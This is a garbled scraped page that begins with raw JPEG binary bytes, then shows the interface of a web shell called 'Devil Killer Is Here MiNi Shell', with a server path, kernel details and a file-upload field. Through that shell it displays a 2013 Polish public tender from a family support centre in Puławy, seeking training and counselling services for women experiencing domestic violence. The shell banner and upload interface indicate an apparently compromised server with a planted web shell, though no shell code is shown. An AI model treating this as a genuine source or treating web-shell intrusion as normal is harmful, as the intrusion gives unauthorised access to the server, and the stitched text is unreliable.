JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/227610-N-2013.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie zajęć dla grupy II w ramach Programu aktywności lokalnej dla osób z problemami opiekuńczo-wychowawczymi</b><br>
<b>Numer ogłoszenia: 227610 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.pulawy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie przewiduje dynamicznego systemu zakupów.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie zajęć dla grupy II w ramach Programu aktywności lokalnej dla osób z problemami opiekuńczo-wychowawczymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający nie dopuszcza składania ofert częściowych na poszczególne zadania odrębnie.
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie zajęć dla grupy II w ramach Programu aktywności lokalnej dla osób doświadczających przemocy w rodzinie lub będących jej świadkami. Na przedmiot zamówienia składają się 2 zadania, tj.:
1.Zadanie 1 - Trening kompetencji wychowawczych wraz z kursem pierwszej pomocy przedmedycznej
2.Zadanie 2 - Poradnictwo grupowe - grupa wsparcia oraz poradnictwo prawne;
Uczestnicy programu - to osoby dorosłe, kobiety w wieku 25-45lat, będące ofiarami lub świadkami przemocy.
Osoby zależne - to dzieci uczestniczek programu w wieku 2-14 lat. 
Liczba uczestników każdego z zadań może ulec zmianie w granicach do 15% in minus.
Zamawiający nie dopuszcza składania ofert częściowych na poszczególne zadania odrębnie.


1)	Zadanie 1 - Trening kompetencji wychowawczych wraz z kursem pierwszej pomocy przedmedycznej

Przedmiotem zamówienia w ramach Zadania 1 jest zorganizowanie i przeprowadzenie treningu kompetencji wychowawczych wraz z  kursem pierwszej pomocy przedmedycznej podczas 6 - dniowego wyjazdu dla 23 osób tj. dla 9 uczestników programu i 14 osób zależnych, łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania i zapewnieniem powrotu.  

a) Miejsce realizacji:
Zamawiający zastrzega, że miejscem realizacji zamówienia ma być miejscowość położona na terenie Pojezierza Mazurskiego na obszarze jednej z niżej wymienionych gmin: 
      -  Giżycko, Ryn, Kruklanki, Miłki, Wydminy - w powiecie giżyckim,
      -  Budry, Węgorzewo - w powiecie węgorzewskim,
      -  Ełk, Stare Juchy - w powiecie ełckim,
      -  Orzysz, Pisz, Ruciane-Nida -  w powiecie pilskim,
      -  Mikołajki, Mrągowo, Piecki - w powiecie mrągowskim,
z zastrzeżeniem, że odległość ośrodka miejsca zakwaterowania uczestników od jeziora nie może przekraczać 1 km,

b) Termin realizacji:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 15 lipca 2013r.
a 25 sierpnia 2013r.

c) Wymagany minimalny zakres tematyczny realizowanych zajęć:
      c.1) Trening kompetencji wychowawczych 
   Zajęcia mają obejmować swoimi zakresem następujące zagadnienia:
-   rozpoznawanie, wyrażanie i akceptowanie uczuć,
-   aktywne, wspierające słuchanie - prawidłowa komunikacja w rodzinie,
-   umiejętność współpracy i współdziałania z dzieckiem,
-   wdrażanie metod skutecznej dyscypliny bez stosowania przemocy,
- uwalnianie siebie i dzieci od zaburzającego rozwój osobowości funkcjonowania 
    w rolach,
-   zachęcanie dzieci do samodzielności,
-  budowanie realnego poczucia własnej wartości dziecka (pochwały, zachęty, ukazywanie
    mocnych stron),
-   konstruktywne rozwiązywanie konfliktów.
       c.2) Kurs pierwszej pomocy przedmedycznej 
Zajęcia zakresem tematycznym obejmować mają zagadnienia niezbędne do udzielania pierwszej pomocy przedmedycznej dzieciom, przy czym zamawiający zastrzega że powyższy kurs ma być kursem rozszerzonym tj. ma dodatkowo obejmować postępowanie/techniki zaopatrywania urazów: oparzeń, urazów kości i stawów, krwotoków oraz postępowanie w zasłabnięciach i użądleniach.
       
d) Sposób prowadzenia oraz czas trwania poszczególnych zajęć:
W zajęciach biorą udział jedynie uczestnicy programu. Podczas trwania poniższych zajęć wykonawca ma zapewnić opiekę nad osobami zależnymi.
d.1) Trening kompetencji wychowawczych  
Trening ma być realizowany przez wykonawcę w formie zajęć grupowych. Uczestnicy programu stanowić będą jedną grupę.
Czas trwania treningu to łącznie 15 godzin zajęć dla grupy, przy czym 1 godzina zajęć to 45 minut treningu. 
Trening kompetencji wychowawczych ma być realizowany przez pięć dni wyjazdu po          3 godziny dziennie. 
            d.2)  Kurs pierwszej pomocy przedmedycznej
Kurs ma być prowadzony w formie zajęć grupowych. Uczestnicy stanowić będą jedną grupę.
Czas trwania zajęć to łącznie 5 godzin dla całej grupy, przy czym 1 godzina zajęć to 45 minut dydaktycznych.

e) Wymagane minimalne kwalifikacje kadry prowadzącej zajęcia: 
e.1) Trening kompetencji wychowawczych
Zajęcia mają być prowadzone przez minimum 1 osobę, która posiadać ma co najmniej wykształcenie wyższe o kierunku psychologia oraz co najmniej 5-letnie doświadczenie zawodowe jako psycholog, w tym minimum 2-letnie doświadczenie w pracy psychologa z osobami dorosłymi doświadczającymi przemocy i obecnie wykonuje zawód psychologa.
e.2) Kurs pierwszej pomocy przedmedycznej
Kurs ma być prowadzony przez minimum 1 osobę, która posiadać ma co najmniej wykształcenie wyższe medyczne o kierunku lekarskim lub co najmniej wykształcenie policealne o kierunku ratownik medyczny.

f) Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: 
Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia dla wszystkich uczestników wyjazdu:
f.1) transport autokarem lub busem osobowym uczestników wyjazdu z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, autokar/bus ma być wyposażony w sprawną klimatyzację,
f.2) transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, 
w którym odbywać się będą zajęcia przekracza 2 km,
f.3)   suchy prowiant dla uczestników programu na czas powrotu do Puław,
f.4) pełne wyżywienie (4 posiłki dziennie tj. śniadanie, obiad - składający się z min. 2 dań, kompotu i deseru, podwieczorek, kolacja) dla wszystkich uczestników z uwzględnieniem potrzeb dietetycznych małych dzieci /mleko, kaszki, zupki/, przy czym pierwszego dnia tj. w dniu wyjazdu z Puław wykonawca zapewnić ma dla uczestników obiad i kolację, natomiast ostatniego dnia tj. w dniu powrotu do Puław wykonawca zapewnić ma dla uczestników śniadanie i obiad;
f.5) bazę noclegową:
 - zakwaterowanie uczestników w domu wczasowym, pensjonacie lub w hotelu - w jednym budynku,
	- zakwaterowanie uczestników w pokojach:
		- 4 pokoje 2-osobowe,
		- 2 pokoje 3-osobowe,
		- 2 pokoje 4-osobowe,
		- 1 pokój 1-osobowy.
- wszystkie pokoje mają być z pełnym węzłem sanitarnym (łazienka i toaleta) oraz całodobowym dostępem do wrzącej wody, dla wszystkich uczestników wykonawca zapewnić ma także w pokojach po 0,5 l wody mineralnej dziennie na osobę oraz zapewnić szklanki;
f.6) opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników programu za cały okres pobytu za wszystkich uczestników, jeśli jest wymagana;
f.7) materiały dydaktyczne/szkoleniowe niezbędne do realizacji zajęć dla każdego uczestnika programu tj. skrypty do treningu kompetencji wychowawczych zawierający skrót informacji przekazywanych podczas zajęć oraz materiały biurowe dla każdego uczestnika tj.                     po 1 notatniku A-4 i po 1 długopisie. Ww. materiały po zakończeniu szkolenia stają się własnością uczestników.
Wszystkie materiały wydane uczestnikom winny być oznaczone logo PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy);
f.8)  serwis kawowy dla wszystkich uczestników programu podczas trwania zajęć, tj. co najmniej kawa, herbata, cukier, śmietanka do kawy, woda mineralna, ciastka, napoje, natomiast dla osób zależnych: ciastka, soki owocowe, woda mineralna, cukierki;
f.9) ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków na czas całego wyjazdu (tj. łącznie z podróżą);
f.10) dostęp do opieki medycznej tzn. zapewnienie przez wykonawcę dowozu uczestnika do   przychodni zdrowia - w przypadku wystąpienia potrzeby udzielenia pomocy lekarskiej lub pielęgniarskiej, a także dostępu do apteczki;
f.11) sale szkoleniowe wyposażone w stoły, krzesła, tablicę, ekran projekcyjny, tablicę typu flipchart i papier do tej tablicy oraz markery;
f.12) dostęp do bazy rekreacyjnej, w tym infrastruktury sportowej, w szczególności do: boiska do gier zespołowych jak również dostęp do sali/świetlicy wyposażonej w TV, stół do tenisa stołowego, stół do bilardu;
f.13) dostęp dzieci do materiałów niezbędnych do przeprowadzenia zajęć z nimi podczas sprawowania opieki, np.: zajęć plastycznych, wspólnych zabaw;
f.14) zapewnienie uczestnikom wyjazdu obsługi kulturalno - oświatowej, programów integracji społecznej tj. co najmniej 1 ogniska z pieczeniem kiełbasek lub grillowania, co najmniej 1 zabawy przy muzyce dla dzieci, co najmniej 1 wycieczki grupowej o charakterze turystyczno-poznawczym;
f.15) co najmniej 2 opiekunów osób zależnych, z których każdy z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku pedagogika i uprawnienia wychowawcy kolonijnego lub co najmniej wykształcenie wyższe o kierunku psychologia i uprawnienia wychowawcy kolonijnego. Do ich zadań należeć ma m.in. sprawowanie opieki nad powierzonymi małoletnimi dziećmi w czasie zajęć uczestników programu poprzez zabawę, zajęcia plastyczne, konkursy, organizacja czasu wolnego, sprawowanie nadzoru nad bezpieczeństwem uczestników. Jedna osoba spośród opiekunów ma pełnić funkcję koordynatora wyjazdu, na czas całego wyjazdu (łącznie z podróżą), do którego zadań należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu (harmonogram wyjazdu ma zawierać w szczególności rozkład każdego dnia wyjazdu z uwzględnieniem posiłków, szkoleń, zajęć, imprez o charakterze integracyjnym, a także godzin i czasu podróży), nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji.
f.16) każdy z uczestników programu otrzymać ma: zaświadczenie o uczestnictwie w treningu kompetencji wychowawczych oraz zaświadczenie o uczestnictwie w kursie pierwszej pomocy przedmedycznej; zaświadczenia mają być oznaczone logo PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznym dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) lub na stronie internetowej www.wup.lublin.pl (pozostałe logotypy).

2)    Zadanie 2 - Poradnictwo grupowe - grupa wsparcia oraz poradnictwo prawne

Przedmiotem zamówienia w ramach Zadania 2 jest zorganizowanie i przeprowadzenie poradnictwa grupowego - grupy wsparcia oraz poradnictwa prawnego dla 9 osób tj. dla uczestników programu wraz z zapewnieniem opieki nad 14 osobami zależnymi podczas grupy wsparcia.

a) Miejsce realizacji:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w budynku usytuowanym na terenie miasta Puławy.

b) Termin realizacji:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 2 września 2013r. a 30 listopada 2013r. z zastrzeżeniem, że poszczególne zajęcia mają odbywać się w następujących terminach:
- grupa wsparcia - spotkania mają odbywać się raz w tygodniu, w piątki z wyjątkiem 01.11.2013r., w godzinach pomiędzy 16:00 a 20:00;
- poradnictwo prawne - zajęcia mają odbywać się od poniedziałku do soboty, z wyjątkiem 01.11.2013r., w godzinach pomiędzy 10:00 a 18:00.

c) Wymagany minimalny zakres tematyczny realizowanych zajęć:
     		 c.1) Poradnictwo grupowe - grupa wsparcia
 Zagadnienia tematyczne realizowane w trakcie zajęć to:   
 - informacje z zakresu interwencji kryzysowej, mediacji rodzinnej, praw i uprawnień osób doświadczających przemocy;
- informacje na temat mechanizmów przemocy;
- wsparcie emocjonalne;
- odblokowywanie emocji;
- przepracowanie problemów;
- rozwiązywanie bieżących problemów uczestników.
c.2) Poradnictwo prawne
Poradnictwo prawne ma obejmować udzielanie informacji o prawach i uprawnieniach, służących przywróceniu samodzielności życiowej, z zakresu prawa rodzinnego i opiekuńczego, prawa karnego, prawa cywilnego, zabezpieczenia społecznego, ochrony praw lokatorów, ustawy o przeciwdziałaniu przemocy w rodzinie.

d) Sposób prowadzenia oraz czas trwania zajęć:
W zajęciach biorą udział jedynie uczestnicy programu. Podczas trwania Poradnictwa grupowego - grupy wsparcia wykonawca ma zapewnić opiekę nad osobami zależnymi.
	d.1) Poradnictwo grupowe - grupa wsparcia
Zajęcia mają odbywać się w formie spotkań grupowych. W ramach grupy wsparcia ma się odbyć 10 spotkań, każde po 3 godziny, czyli łącznie 30 godzin poradnictwa grupowego, przy czym 1 godzina poradnictwa to 45 minut zajęć. Po każdych 2 godzinach zajęć wykonawca ma zapewnić 15 minut przerwy.
d.2) Poradnictwo prawne 
Poradnictwo prawne ma być prowadzone w formie indywidualnych spotkań a na każdego z uczestników programu ma przypadać po 4 godziny poradnictwa zorganizowanego w formie 2 spotkań, każde trwające po 2 godziny, przy czym 1 godzina poradnictwa prawnego to 45 minut. 
 
e) Wymagane minimalne kwalifikacje kadry prowadzącej zajęcia: 
e.1) Poradnictwo grupowe - grupa wsparcia
Zajęcia mają być prowadzone przez minimum 1 osobę, która posiadać ma co najmniej wykształcenie wyższe o kierunku psychologia oraz co najmniej 5-letnie doświadczenie zawodowe jako psycholog w tym minimum 2-letnie doświadczenie w pracy psychologa z osobami dorosłymi doświadczającymi przemocy i obecnie wykonuje zawód psychologa.
e.2) Poradnictwo prawne
Zajęcia mają być prowadzone przez minimum 1 osobę, która ma posiadać co najmniej wykształcenie wyższe o kierunku prawo.

f) Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: 
Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia dla wszystkich uczestników wyjazdu:
	f.1) materiały dydaktyczne/szkoleniowe niezbędne do realizacji zajęć dla każdego uczestnika programu tj. skrypty do grupy wsparcia zawierające skrót informacji przekazywanych podczas zajęć oraz materiały biurowe dla każdego uczestnika tj. po 1 notatniku A-4 i po 1 długopisie. Ww. materiały po zakończeniu szkolenia stają się własnością uczestników.
	Wszystkie materiały wydane uczestnikom winny być oznaczone logo PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy);
	f.2)  serwis kawowy dla wszystkich uczestników programu podczas trwania zajęć, tj. co najmniej kawa, herbata, cukier, śmietanka do kawy, woda mineralna, ciastka, napoje, natomiast dla osób zależnych: ciastka, soki owocowe, woda mineralna, cukierki;
	f.3) sale szkoleniowe wyposażone w stoły, krzesła, tablicę, ekran projekcyjny, tablicę typu flipchart i papier do tej tablicy oraz markery; sala szkoleniowa ma znajdować się w pobliżu gdzie będzie sprawowana opieka nad osobami z otoczenia.
	f.4) dostęp dzieci do materiałów niezbędnych do przeprowadzenia zajęć z nimi podczas sprawowania opieki, np.: zajęć plastycznych, wspólnych zabaw;
	f.5) co najmniej 2 opiekunów osób zależnych, z których każda z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku pedagogika i uprawnienia wychowawcy kolonijnego lub co najmniej wykształcenie wyższe o kierunku psychologia i uprawnienia wychowawcy kolonijnego. Do ich zadań należeć ma m.in. sprawowanie opieki nad powierzonymi małoletnimi dziećmi w czasie zajęć uczestników programu poprzez zabawę, zajęcia plastyczne, konkursy, sprawowanie nadzoru nad bezpieczeństwem uczestników. 
	f.6)każdy z uczestników programu otrzymać ma: zaświadczenie o uczestnictwie w poradnictwie grupowym - grupie wsparcia oraz o uczestnictwie w poradnictwie prawnym; zaświadczenia mają być oznaczone logo PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznym dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) lub na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.12.12.70-6, 55.11.00.00-4, 55.24.00.00-4, 80.56.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, jeżeli wykonawca wykaże, że - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, należycie co najmniej 2 usługi szkoleniowe w formie wyjazdowej z zapewnieniem zakwaterowania i wyżywienia, o zakresie tematycznym tożsamym bądź zbliżonym do przedmiotu zamówienia    Zadania 1 Części 2 i o wartości brutto minimum 20.000,00 zł każda. Zamawiający dokona oceny spełniania warunku na podstawie złożonych przez wykonawcę dokumentów i oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony ww. warunek, jeżeli wykonawca zapewni przy realizacji zamówienia udział minimum 5 osób, tj.:
- minimum 1 osoby, która posiadać ma co najmniej wykształcenie wyższe o kierunku psychologia oraz co najmniej 5-letnie doświadczenie zawodowe jako psycholog w tym minimum 2-letnie doświadczenie w pracy psychologa z osobami dorosłymi doświadczającymi przemocy i obecnie wykonuje zawód psychologa (do prowadzenia Treningu kompetencji wychowawczych, Poradnictwa grupowego - grupy wsparcia)  oraz 
- minimum 1 osoby, która posiadać ma co najmniej wykształcenie wyższe medyczne o kierunku lekarskim lub co najmniej wykształcenie policealne o kierunku ratownik medyczny ( do prowadzenia Kursu pierwszej pomocy przedmedycznej), i
- minimum 1 osoby, która posiadać ma co najmniej wykształcenie wyższe o kierunku prawo ( do prowadzenia Poradnictwa prawnego), oraz
- minimum 2 osób z których każda z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku pedagogika i uprawnienia wychowawcy kolonijnego lub co najmniej wykształcenie wyższe o kierunku psychologia i uprawnienia wychowawcy kolonijnego (do sprawowania opieki nad osobami zależnymi i pełnienia funkcji koordynatora wyjazdu).
Zamawiający dokona oceny spełniania warunku na podstawie złożonych przez wykonawcę dokumentów i oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

